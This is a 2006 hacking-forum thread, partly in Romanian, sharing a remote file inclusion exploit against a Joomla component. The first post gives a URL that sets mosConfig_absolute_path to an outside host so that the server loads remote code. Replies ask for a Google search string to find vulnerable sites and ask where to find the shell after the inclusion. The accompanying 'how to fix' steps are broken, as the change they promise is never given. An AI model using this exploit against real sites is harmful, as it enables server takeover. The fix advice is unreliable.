Fatal1ty Posted August 19, 2006 Report Share Posted August 19, 2006 Exploit:http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://scripts.comHow to fix:1.) open config.kochsuite.php2.) take a look at line 46:# Don't allow direct linking defined( '_VALID_MOS' ) ordie( 'Direct Access to this location is not allowed.' );3.) take a look at line 47:require_once ($mosConfig_absolute_path.'/administrator/components/com_kochsuite/includes/letters.inc');4.) change line 46:defined( '_VALID_MOS' ) ordie( 'Direct Access to this location is not allowed.' ); Quote Link to comment Share on other sites More sharing options...
SpLo1T Posted August 21, 2006 Report Share Posted August 21, 2006 google dork : ? Quote Link to comment Share on other sites More sharing options...
Fatal1ty Posted August 21, 2006 Author Report Share Posted August 21, 2006 pai nu prea ai cum sa pui greetz pt ca eu am luat asta de pe h4ky0u iar acolo la postat CyberPhreak dar probabil ca si el la luat din alta parte deci nu la facut el .... dak toti ar dak credit adik si primul care copiaza du[a autor si tot asa am stii cine este adevaratul autor si iam putea oferii credit bucurosi Quote Link to comment Share on other sites More sharing options...
Pastilatu' Posted August 21, 2006 Report Share Posted August 21, 2006 eu chiar nu inteleg asta cu file inclusion...cum se transforma .txt in .php....si dupa ce fac inclusionu unde gasesc shellul Quote Link to comment Share on other sites More sharing options...